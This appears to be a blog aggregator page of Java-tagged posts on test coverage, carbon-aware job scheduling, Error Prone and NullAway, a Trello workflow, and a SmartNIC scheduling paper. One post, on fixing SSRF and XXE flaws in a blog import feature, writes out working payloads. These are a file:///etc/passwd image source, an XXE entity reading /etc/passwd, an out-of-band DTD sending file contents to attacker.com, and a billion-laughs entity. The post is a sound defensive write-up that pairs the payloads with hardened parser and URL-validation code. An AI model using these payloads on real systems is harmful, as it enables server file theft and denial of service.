Posts in Java (20 found)

Coverage

Sometimes the question arises: which tests trigger this code here? Maybe I've found a block of code that doesn't look like it can be hit, but it's hard to prove. Or I want to answer the age-old question of which subset of quick tests might be useful to run when the full test suite is kinda slow. So, run each test with coverage by itself. Then, instead of merging all the coverage data, find which tests cover the line in question.

Oddly enough, though some of the Java tools (e.g., Clover) support per-test coverage, the tools here are in general somewhat lacking. One tool, part of the suite, supports a ("test name") marker, but only displays the per-test data at a per-file level. This is the kind of thing where, in 2025, you can ask a coding agent to vibe-code or vibe-modify a generator, and it'll work fine.

I have not found the equivalent of Profilerpedia for coverage file formats, but the lowest common denominator seems to be the tracefile format described at geninfo(1). Most language ecosystems can either produce LCOV output directly or have pre-existing conversion tools.
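For reference, here is what a minimal tracefile in the geninfo(1) format looks like, with the per-test `TN:` marker. `SF:` names the source file, `DA:<line>,<count>` records per-line hits, and `LF`/`LH` are the lines-found/lines-hit totals (the path and counts are invented for illustration):

```text
TN:MyWidgetTest
SF:src/main/java/com/example/Widget.java
DA:12,3
DA:13,0
LF:2
LH:1
end_of_record
```

Grouping records by `TN:` instead of merging them is exactly what answers "which tests cover this line?".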

Brain Baking 2 days ago

Using Energy Prediction To Better Plan Cron Jobs

Since the Belgian government mandated the use of digitized smart energy meters we’ve been more carefully monitoring our daily energy demand. Before, we’d simply chuck all the dishes in the machine and program it to run at night: no more noise when we’re around. But now, consuming energy at night is costing us much more. The trick is to take as little as possible from the grid, but also put as little as possible back. In short, consume (or store) energy when our solar panels produce it. That dishwasher will have to run at noon instead.

The same principle applies to running demanding software: CPU- or GPU-intensive tasks consume an awful lot of energy, so why run them when there’s less energy available locally, thus paying more? Traditionally, these kinds of background jobs are scheduled at night using a simple cron expression that says “At 03:00 AM, kick things in gear”. But we can do better. At 03:00 AM, our solar panels are asleep too. Why not run the job when the sun is shining? Probably because you don’t want to interfere with the heavy daytime load your end users put on your software system. It’s usually not a good idea to start generating PDF files en masse, clogging up all available threads and severely slowing down the handling of incoming HTTP requests. But there’s still a big margin for improving the planning of the job: instead of saying “At 03:00 AM exactly”, why can’t we say “Between 01:00 AM and 07:00 AM”? That’s still before the big HTTP rush, and in the early morning, chances are there’s more cheap energy available to you.

Cooking up a simple version of this for home use is easy with the help of Home Assistant. The following historical graph shows our typical energy demand during the last week (dreadful Belgian weather included):

Home Assistant history of P1 Energy Meter Demand from 24 Nov to 28 Nov.

Care to guess what these spikes represent? Evenings.
Turning on the stove, the oven, the lights, the TV obviously creates a big spike in energy consumption, and at the same time, the moon replacing the sun results in us taking from instead of giving to the energy grid. This is the reason the government charges more at those times: if everybody creates spikes at the same time, there’s much more pressure on the general grid. But I can’t bake my fries at noon when I’m at work, and we aren’t supposed to watch TV when we’re working from home…

That data is available through the Home Assistant API; use an Authorization header with a Bearer token created in your Home Assistant profile. If you collect this for a few weeks and average the results you can make an educated guess when demand will be going up or down. If you want things to get a bit more fancy, you can use the EMHASS Home Assistant plug-in that includes a power production forecast module. This thing uses machine learning and other APIs such as https://solcast.com/ that predict solar power—or weather in general: the better the weather, the more power available to burn through (given you’ve got solar panels installed). EMHASS also internalizes your power consumption habits. Combined, its prediction model can help to better plan your jobs when energy demand is low and availability is high. You don’t need Home Assistant to do this, but the software does help smooth things over with centralized access to data using a streamlined API. Our energy consumption and generation are measured using HomeWizard’s P1 Meter that plugs into our provider’s digital meter and sends the data over to Home Assistant.

That’s cool if you are running software in your own basement, but will hardly do on a bigger scale. Instead of monitoring your own energy usage, you can rely on grid data from the providers. In Europe, the European Network of Transmission System Operators for Electricity (ENTSO-E) provides APIs to access power statistics based on your region—including a day-ahead forecast!
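The Home Assistant REST API mentioned above is queried with a Bearer token. A minimal sketch using Java’s built-in HttpClient types, which only builds the request; the host, entity id, and token are placeholders you’d substitute with your own:

```java
import java.net.URI;
import java.net.http.HttpRequest;

public class HomeAssistantQuery {
    // Build (not send) a request for one sensor's current state.
    static HttpRequest stateRequest(String baseUrl, String entityId, String token) {
        return HttpRequest.newBuilder()
                .uri(URI.create(baseUrl + "/api/states/" + entityId))
                .header("Authorization", "Bearer " + token)
                .header("Content-Type", "application/json")
                .GET()
                .build();
    }

    public static void main(String[] args) {
        // Hypothetical instance, entity id, and token.
        HttpRequest req = stateRequest("http://homeassistant.local:8123",
                "sensor.p1_meter_active_power", "LONG_LIVED_TOKEN");
        System.out.println(req.uri());
    }
}
```

Send it with `HttpClient.newHttpClient().send(req, HttpResponse.BodyHandlers.ofString())` and you get the sensor state as JSON, ready to average over a few weeks.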
In the USA, there’s the U.S. Energy Information Administration (EIA) providing the equivalent, also including a forecast, depending on the state. ENTSO-E returns a day-ahead pricing model while EIA returns consumption in megawatt-hours, but both statistics can be used for the same thing: to better plan that cron job.

And that’s exactly what we at JobRunr managed to do. JobRunr is an open-source Java library for easy asynchronous background job scheduling that I’ve had the pleasure to work on over the last year. Using JobRunr, planning a job with a cron expression is trivial. But we don’t want that thing to trigger at 3 AM, remember? Instead, we want it to trigger within an interval, when the energy prices are at their lowest, meaning the CPU-intensive job will produce the least amount of CO2. In JobRunr v8, we introduced the concept of Carbon Aware Job Processing, which uses the energy predictions of the aforementioned APIs to better plan your cron jobs. The configuration for this is ridiculously easy: (1) tell JobRunr which region you’re in, (2) adjust that cron. Done. Instead of a plain cron expression, use the carbon-aware variant: this means “plan somewhere between an hour before 3 AM and four hours after 3 AM, when the lowest amount of CO2 will be generated”. That string is not a valid cron expression but a custom extension on it we invented to minimize configuration. Behind the scenes, JobRunr will look up the energy forecasts for your region and plan the job according to your specified time range. There are other ways to plan jobs (e.g. fire-and-forget, scheduling at an explicit instant instead of with a cron, …), but you get the gist.

JobRunr’s dashboard can be consulted to inspect when the job is due for processing. Since the scheduler’s picks can sometimes be confusing—why did it plan this at 6 AM and not at 7?—the dashboard also visualizes the predictions.
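The planning principle is a small search: pick the slot with the cheapest (greenest) energy inside the allowed window. A toy sketch in plain Java, with invented prices and window; JobRunr’s real implementation consults the forecast APIs instead:

```java
import java.util.List;

public class CarbonAwareWindow {
    // Given day-ahead prices, one per hour of the allowed window,
    // return the offset of the cheapest hour. A stand-in for
    // "lowest forecast carbon intensity".
    static int cheapestHourOffset(List<Double> hourlyPrices) {
        int best = 0;
        for (int i = 1; i < hourlyPrices.size(); i++) {
            if (hourlyPrices.get(i) < hourlyPrices.get(best)) {
                best = i;
            }
        }
        return best;
    }

    public static void main(String[] args) {
        // Invented EUR/MWh prices for the window 01:00 through 06:00.
        List<Double> prices = List.of(82.0, 75.0, 68.0, 55.0, 61.0, 90.0);
        int offset = cheapestHourOffset(prices);
        System.out.println("Run the job at " + (1 + offset) + ":00");
    }
}
```

Swap the price list for a carbon-intensity forecast and the same argmin gives you the greenest slot in the window.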
In the following screenshot, you can see the job being planned at 15:00, with an initial interval between 09:39 and 17:39 (GMT+2):

The JobRunr dashboard: a pending job, to be processed on Mon Jul 07 2025 at 15:00.

There’s also a practical guide that helps you get started if you’re interested in fooling around with the system. The idea here is simple: postpone firing up that CPU to the moments with more sunshine, when energy is more readily available, and when less CO2 will be generated 1 . If you’re living in Europe/Belgium, you’re probably already trying to optimize the energy consumption in your household the exact same way because of the digital meters. Why not apply this principle on a grander scale?

Amazon offers EC2 Spot Instances to “optimize compute usage”, which is also marketed as more sustainable, but this is not the same thing. Shifting your cloud workload to a Spot Instance will use “spare energy” that was already being generated. JobRunr, and hopefully soon other software that optimizes jobs based on energy availability, plans using marginal changes. In theory, that decision can determine which fuel gets burned, as demand spikes force high-emission plants to burn more. In always-on infrastructure, spare compute capacity is sold as the Spot product—there’s no marginal change. The environmental impact of planning your job to align with low grid carbon intensity is much higher—in a good way—compared to shifting cloud instance types from on-demand/reserved to Spot. Still, it’s better than nothing, I guess. If the recent outages of these big cloud providers have taught us anything, it’s that on-premise self-hosting is not dead yet.

If you happen to be rocking Java, give JobRunr a try. And if you’re not, we challenge you to implement something similar and make the world a better place! You probably already noticed that in this article I’ve interchanged carbon intensity with energy availability.
It’s a lot more complicated than that, but for the purpose of Carbon Aware Job Processing, we assume a strong relationship between the electricity price and CO2 emissions.  ↩︎

Related topics: / java / By Wouter Groeneveld on 28 November 2025.  Reply via email .

Hugo 2 days ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to resources of a vulnerable server. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them into my own storage (Bunny in my case). For example, imagine I have this in a Medium page:

```html
<img src="https://miro.medium.com/…/image.jpg">
```

I need to download the image, then re-upload it to Bunny.
During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny. Okay. But what happens if the user writes this:

```html
<img src="file:///etc/passwd">
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
<img src="http://localhost:8080/">
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

// ...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress
}
```

But here, I still have a risk.
The user can write:

```html
<img src="https://attacker.example/innocent.jpg">
```

And this could still be risky if the hacker makes that URL redirect to /etc/passwd. So we need to block redirect requests:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000

val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode != null && responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
<!DOCTYPE wordpress [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
...
<content:encoded>&xxe;</content:encoded>
```

This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly:

```xml
<!DOCTYPE wordpress [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?%file;'>">
%all;
```

Finally, to crash a server, the attacker could also have done this:

```xml
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!-- ... lol2 through lol8 expand the same way ... -->
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<title>&lol9;</title>
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.
We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()
// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture-the-flag events at Mixit. And he loves trying to find this kind of vulnerability.
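As a sanity check, the DOCTYPE ban above is easy to verify against the stock JDK parser. A minimal, self-contained probe (my own snippet, in Java rather than the post's Kotlin):

```java
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXParseException;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

public class XxeHardeningDemo {
    // Returns true when the hardened parser refuses a document
    // carrying a DOCTYPE declaration.
    static boolean rejectsDoctype(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        try {
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false; // parsed without complaint: not hardened
        } catch (SAXParseException expected) {
            return true;  // DOCTYPE refused, as intended
        }
    }

    public static void main(String[] args) throws Exception {
        String payload = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                + "<post>&xxe;</post>";
        System.out.println(rejectsDoctype(payload));
    }
}
```

With `disallow-doctype-decl` set, the parse aborts before any entity is ever resolved, which also neutralizes the billion-laughs variant.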

Brain Baking 4 days ago

Rendering Your Java Code Less Error Prone

Error Prone is Yet Another Programming Cog invented by Google to improve their Java build system. I’ve used the multi-language PMD static code analyser before (don’t shoot the messenger!), but Error Prone takes it a step further: it hooks itself into your build system, converting programming errors into compile-time errors. Great, right: detecting errors earlier, without having to kick an external process like PMD into gear? Sure, until you’re forced to deal with hundreds of errors after enabling it. Expect a world of hurt when your intention is to switch to Error Prone just to improve code linting, especially for big existing code bases. Luckily, there’s a way to gradually tighten the screw: first let it generate a bunch of warnings, and only when you’ve tackled most of them, turn on Error! Halt! mode. When using Gradle with multiple subprojects, things get a bit more convoluted. This mainly serves as a recollection of things that finally worked—feeling of relief included.

The root file:

The first time you enable it, you’ll notice a lot of nonsensical errors popping up: that’s what that is for. We currently have the following errors disabled:

Error Prone’s powerful extensibility resulted in Uber picking up where Google left off by releasing NullAway, a plug-in that does annotation-based null checking, fully supporting the JSpecify standard. That is, it checks for stupid stuff like: JSpecify is a good attempt at unifying these annotations—last time I checked, IntelliJ suggested auto-importing them from five different packages—but the biggest problem is that you’ll have to dutifully annotate where needed yourself. There are OpenRewrite JSpecify recipes available to automatically add them, but that won’t even cover 20% of the cases: when it comes to manual if-null checks and the use of , NullAway is just too stupid to understand what your intentions are. NullAway assumes non-null by default.
This is important, because in Java, every object reference is nullable by default. You won’t need to add a lot of annotations, but adding one has a significant ripple effect: if that’s nullable, then the object calling this object might also be, which means I should add this annotation here and here and here and here and here and… Uh oh. After 100 compile errors, Gradle gives up. I fixed 100 errors, recompiled, and 100 more appeared. This fun exercise lasted almost an entire day until I was the one giving up. The potential commit touched hundreds of files and added more bloat to an already bloated (it’s Java, remember) code base. Needless to say, we’re currently evaluating our options here.

I’ve also had quite a bit of trouble picking the right combination of Gradle plug-ins to get this thing working. In case you’d like to give it a go, extend the above configuration with:

You have to point NullAway to the base package path ( ), otherwise it can’t do its thing. Note the configuration: we had a lot of POJOs with private constructors that set fields to null while they actually cannot be null because of serialisation frameworks like Jackson/Gson. Annotate these with and NullAway will ignore them.

If you thought fixing all Error Prone errors was painful, wait until you enable NullAway. Every single nullable statement needs its annotation. OpenRewrite can help, but only up to a point: for more complicated assignments you’ll need to decide for yourself what to do. Not that the exercise didn’t bear any fruit. I’ve spotted more than a few potential mistakes we made in our code base this way, and it’s fun to try and minimize nullability. The best option of course is to rewrite the whole thing in Kotlin and forget about the suffix. All puns aside, I can see how Error Prone and its plug-ins can help catch bugs earlier, but it’s going to come at a cost: that of added annotation bloat.
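The class of bug NullAway exists to catch is ordinary Java like the following (names are mine, for illustration). With JSpecify annotations, `findNickname` would be marked `@Nullable`, and NullAway would reject any unguarded dereference of its result at compile time:

```java
public class NullableLookup {
    // In JSpecify terms this return type would carry @Nullable:
    // the lookup can legitimately miss.
    static String findNickname(String user) {
        return user.equals("wouter") ? "w" : null;
    }

    public static void main(String[] args) {
        String nick = findNickname("someone-else");
        // Without the null guard, plain javac compiles this fine and it
        // throws NullPointerException at runtime; NullAway forces the guard.
        if (nick != null) {
            System.out.println(nick.length());
        } else {
            System.out.println("no nickname");
        }
    }
}
```

The ripple effect described above starts exactly here: once `findNickname` is nullable, every caller must either guard or become nullable itself.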
You probably don’t want to globally disable too many errors, so suppressions are also going to pop up much more often. A difficult team decision to make indeed.

Related topics: / java / By Wouter Groeneveld on 25 November 2025.  Reply via email .

The errors we disabled, and why:

- —that’s a Google-specific one? I don’t even agree with this thing being here…
- —we’d rather have on every line next to each other
- —we can’t update to JDK9 just yet
- —we’re never going to run into this issue
- —good luck with fixing that if you heavily rely on reflection

Dan Moore! 1 week ago

Thankful For Memory Managed Languages

I’m thankful my software career started when memory managed languages were first available and then dominant. Or at least dominant in the areas of software that I work in–web application development.

I learned BASIC, WordPerfect macros, and Logo before I went off to college. But my first real programming experience was with Pascal in a class taught by Mr. Underwood (who passed away in 2021 ). I learned for loops, print debugging and how to compile programs. Pascal supports pointers but I don’t recall doing any pointer manipulations–it was a 101 class after all. I took one more CS class where we were taught C++ but I dropped it.

But my real software education came in the WCTS ; I was a student computer lab proctor. Between that and some summer internships, I learned Perl, web development and how to deal with cranky customers (aka students) when the printer didn’t work. I also learned how to install Linux (Slackware, off of something like 16 3.5-inch disks) on a used computer with a 40MB hard drive, how to buy hardware off eBay, and not to run in a C program. That last one: not good.

I was also able to learn enough Java through a summer internship that I did an honors thesis in my senior year of college. I used Java RMI to build a parallelizable computation system. It did a heck of a job of calculating cosines.

My first job out of school was slinging Perl, then Java, for web applications at a consultancy in Boulder. I learned a ton there, including how to grind (one week I billed 96 hours), why you shouldn’t use stored procedures for a web app, how to decompile a Java application with jad to work around a bug, and how to work on a team.

One throughline for all that was getting the work done as fast as possible. That meant using languages and frameworks that optimized for developer productivity rather than pure performance. Which meant using memory managed languages.
Which are, as Joel Spolsky wrote , similar to an automatic transmission in terms of letting you just go. I have only the faintest glimmer of the pain of writing software in a language that requires manual memory management. Sure, it pops up from time to time, usually when I am trying to figure out a compile error when building an Apache module or Ruby gem. I google for an incantation, blindly set environment variables or modify the makefile, and hope it compiles. But I don’t have to truly understand malloc or free.

I’m so thankful that I learned to program when I didn’t have to focus on the complexities of memory management. It’s hard enough to manage the data model, understand language idiosyncrasies, make sure you account for edge cases, understand the domain and the requirements, and deliver a maintainable solution without having to worry about core dumps and buffer overflows.

A Room of My Own 1 week ago

My One-Board Trello Task Management System

So I just came out of a project management webinar — and they shared this really simple task-management method. And I realized that I’ve basically been doing this all along. It’s about moving away from constantly trying to prioritise everything to simply postponing things in a deliberate, thought-out way. And it felt nice to see that this thing I pieced together is, in fact, a “real” method.

After years of trying to figure out how to manage all my different tasks, I came up with a system a few years ago that has just worked. I haven’t had to change it in ages. I’ve tried different apps, different methods, different everything — but this setup (which I run in Trello, though you could do it anywhere that has Kanban boards) has stuck. Why Trello? Mostly because it’s free, simple, and the phone app works. It sends reminders to my email (which I’ll see because I keep inbox zero) and as phone pop-ups. The email part is key for me — if it hits my inbox, it won’t get lost.

Over time this system grew with me, but this is where I’ve landed: one single board . Just one. Below is the breakdown of my lists on this one board (though I do add more when I need to — if I have extra tasks or a project, like planning a trip or spring cleaning, I’ll add a temporary list for it). When a task or a list is done, I delete it. I don’t archive it, I don’t capture it anywhere else. Done and gone. You can email directly into Trello — I rarely do, but I like knowing I could.

This list is where I stick generic things: kids’ school holidays, public and work statutory holidays, my goals for the year, and my very loose 5-year “plan” (which is more vibes than plan, honestly).

Because I like the Eisenhower Matrix method (I wrote about it here) , I have a few lists that follow that idea:

Urgent + important - things that actually need to happen pretty soon or right away.

That elusive middle ground where all the good long-term things live.
I’m honestly terrible at this list lately because work has been so full-on — which is also why my personal projects, like blogging, have been basically nonexistent. But this is where those long-term goals go: things like education, personal skill development, improving health and wellness — all the stuff that matters but always falls behind the “do immediately” tasks, and therefore needs to be scheduled.

Anything already booked, or anything that repeats: insurance payments, car registration, health appointments, whatever. I put a date on it, set a reminder, and forget about it until it surfaces again. I do this for the whole family. Why not just put it all in my shared (with my husband and son) Google Calendar? Because some things don’t need to be done on the day they pop up. For example: car registration. I set a reminder a month before it’s due. I won’t do it that exact day, but it will pop up, I’ll drag it to “Do Immediately,” and then it gets done. If something goes in Google Calendar, it’s because it happens at an actual fixed time — dinner with a friend, a scheduled doctor’s appointment, whatever. Those don’t go in Trello. This took me a long time to figure out.

These are things that don’t need to be done, nothing is riding on them, but they matter to me (and maybe they shouldn’t). I wrote about some of it here: The Art of Organizing (Things That Don’t Need to Be Organized) The Journal Project I Can’t Quit The Cost of Organizing Ideas – But I Keep Doing It Anyway

An example is my digital photo books. I use Mixbook or Shutterfly, and the kids love having a physical copy of the digital photo books to leaf through. And so do I. I make ones for big trips too. But then I realised: if those companies disappear, all my digital books vanish. You can’t download them as PDFs or export them in any meaningful way (apart from having the printed copies — but what if my house burns down, or I want another copy?).
After researching and asking around, the only real solution seems to be opening them full screen, taking screenshots, and saving them in Day One. It’s a huge project (well, potentially - once I start working on something and break it down into smaller tasks, it gets done). But I’m not touching it right now. However, having it on the list gets it out of my head.

The other lists I have on my board are:

I like knowing how much I spend and when things renew. I regularly cancel things. For example, Kindle Unlimited: I sign up when there’s a deal or when I need it, then cancel again. Same with Apple TV — if there’s a show I want, I get it for a month, then drop it. I hate having too many subscriptions that sit there unused.

I didn’t put these in recurring tasks because some documents are valid for years or even decades. So I just keep a list. Sometimes I attach the files, but I don’t fully trust Trello with sensitive things, so the actual scanned documents live in my Dropbox.

Renovations, things I want to study, photo books I still want to make. These live even further out than the “may or may not do” list. Not urgent, not actionable, probably not happening soon — but I don’t want to forget about them either. And most importantly, I don’t want to think about them. When I do a review, I’ll see them, remember them, and that’s enough.

It’s simple. It’s not over-engineered. It’s not automated to death. It’s easy to maintain. And most importantly: things actually get done. My lists used to be huge and chaotic. This isn’t.

NOTE: For work tasks I use Microsoft To Do, since it plugs straight into the rest of the Microsoft ecosystem we use.


Tai Chi: A General High-Efficiency Scheduling Framework for SmartNICs in Hyperscale Clouds

Tai Chi: A General High-Efficiency Scheduling Framework for SmartNICs in Hyperscale Clouds

Bang Di, Yun Xu, Kaijie Guo, Yibin Shen, Yu Li, Sanchuan Cheng, Hao Zheng, Fudong Qiu, Xiaokang Hu, Naixuan Guan, Dongdong Huang, Jinhu Li, Yi Wang, Yifang Yang, Jintao Li, Hang Yang, Chen Liang, Yilong Lv, Zikang Chen, Zhenwei Lu, Xiaohan Ma, and Jiesheng Wu

SOSP'25

Here is a contrarian view: the existence of hypervisors means that operating systems have fundamentally failed in some way. I remember thinking this a long time ago, and it still nags me from time to time. What does a hypervisor do? It virtualizes hardware so that it can be safely and fairly shared. But isn’t that what an OS is for? My conclusion is that this is a pragmatic engineering decision. It would simply be too much work to try to harden a large OS such that a cloud service provider would be comfortable allowing two competitors to share one server. It is a much safer bet to leave the legacy OS alone and instead introduce the hypervisor.

This kind of decision comes up in other circumstances too. There are often two ways to go about implementing something. The first way involves widespread changes to legacy code, and the other way involves a low-level Jiu-Jitsu move which achieves the desired goal while leaving the legacy code untouched. Good managers have a reliable intuition about these decisions.

The context here is a cloud service provider which virtualizes the network with a SmartNIC. The SmartNIC (e.g., NVIDIA BlueField-3 ) comprises ARM cores and programmable hardware accelerators. On many systems, the ARM cores are part of the data-plane (software running on an ARM core is invoked for each packet). These cores are also used as part of the control-plane (e.g., programming a hardware accelerator when a new VM is created). The ARM cores on the SmartNIC run an OS (e.g., Linux), which is separate from the host OS.
The paper says that the traditional way to schedule work on SmartNIC cores is static scheduling. Some cores are reserved for data-plane tasks, while other cores are reserved for control-plane tasks. The trouble is, the number of VMs assigned to each server (and the size of each VM) changes dynamically. Fig. 2 illustrates a problem that arises from static scheduling: control-plane tasks take more time to execute on servers that host many small VMs.

Source: https://dl.acm.org/doi/10.1145/3731569.3764851

Dynamic Scheduling Headaches

Dynamic scheduling seems to be a natural solution to this problem. The OS running on the SmartNIC could schedule a set of data-plane and control-plane threads. Data-plane threads would have higher priority, but control-plane threads could be scheduled onto all ARM cores when there aren’t many packets flowing. Section 3.2 says this is a no-go. It would be great if there were more detail here. The fundamental problem is that control-plane software on the SmartNIC calls kernel functions which hold spinlocks (which disable preemption) for relatively long periods of time. For example, during VM creation, a programmable hardware accelerator needs to be configured such that it will route packets related to that VM appropriately. Control-plane software running on an ARM core achieves this by calling kernel routines which acquire a spinlock and then synchronously communicate with the accelerator.

The authors take this design as immutable. It seems plausible that the communication with the accelerator could be done in an asynchronous manner, but that would likely have ramifications for the entire control-plane software stack. This quote is telling:

> Furthermore, the CP ecosystem comprises 300–500 heterogeneous tasks spanning C, Python, Java, Bash, and Rust, demanding non-intrusive deployment strategies to accommodate multi-language implementations without code modification.
Here is the Jiu-Jitsu move: lie to the SmartNIC OS about how many ARM cores the SmartNIC has. Fig. 7(a) shows a simple example. The underlying hardware has 2 cores, but Linux thinks there are 3. One of the cores that the Linux scheduler sees is actually a virtual CPU (vCPU), the other two are physical CPUs (pCPU). Control-plane tasks run on vCPUs, while data-plane tasks run on pCPUs. From the point of view of Linux, all three CPUs may be running simultaneously, but in reality, a Linux kernel module (5,800 lines of code) is allowing the vCPU to run at times of low data-plane activity. Source: https://dl.acm.org/doi/10.1145/3731569.3764851 One neat trick the paper describes is the hardware workload probe . This takes advantage of the fact that packets are first processed by a hardware accelerator (which can do things like parsing of packet headers) before they are processed by an ARM core. Fig. 10 shows that the hardware accelerator sees a packet at least 3 microseconds before an ARM core does. This enables the system to hide the latency of the context switch from vCPU to pCPU. Think of it like a group of students in a classroom without any teachers; the teachers here are the network packets. The kids nominate one student to be on the lookout for an approaching adult. When the coast is clear, the students misbehave (i.e., execute control-plane tasks). When the lookout sees the teacher (a network packet) returning, they shout “act responsible”, and everyone returns to their schoolwork (running data-plane code). Source: https://dl.acm.org/doi/10.1145/3731569.3764851 Results Section 6 of the paper has lots of data showing that throughput (data-plane) performance is not impacted by this technique. Fig. 17 shows the desired improvement for control-plane tasks: VM startup time is roughly constant no matter how many VMs are packed onto one server.
Source: https://dl.acm.org/doi/10.1145/3731569.3764851 Dangling Pointers To jump on the AI bandwagon, I wonder if LLMs will eventually change the engineering equation. Maybe LLMs will get to the point where widespread changes across a legacy codebase will be tractable. If that happens, then Jiu-Jitsu moves like this one will be less important.
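To make the "lookout" idea a bit more concrete, here is a toy model of my own in Java (entirely invented, not the paper's code): the hardware probe is modeled as a shared flag raised a few microseconds before a packet reaches an ARM core, and a slice of control-plane work checks it and stops as soon as a packet approaches.

```java
import java.util.concurrent.atomic.AtomicBoolean;

class LookoutScheduler {
    // Set by the "hardware probe" ~3us before a packet reaches an ARM core.
    final AtomicBoolean packetApproaching = new AtomicBoolean(false);
    int controlPlaneSteps = 0;

    // A vCPU slice of control-plane work: runs only while the coast is clear,
    // so the pCPU never waits behind a long control-plane critical section.
    void runControlPlaneSlice(int budget) {
        for (int i = 0; i < budget && !packetApproaching.get(); i++) {
            controlPlaneSteps++; // stand-in for e.g. VM-creation work
        }
    }
}
```

The real system does this at the granularity of a kernel-module context switch, not a loop check, but the shape is the same: the early warning buys enough time to get control-plane work off the core.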

0 views
A Room of My Own 1 weeks ago

Letting Go of My Library

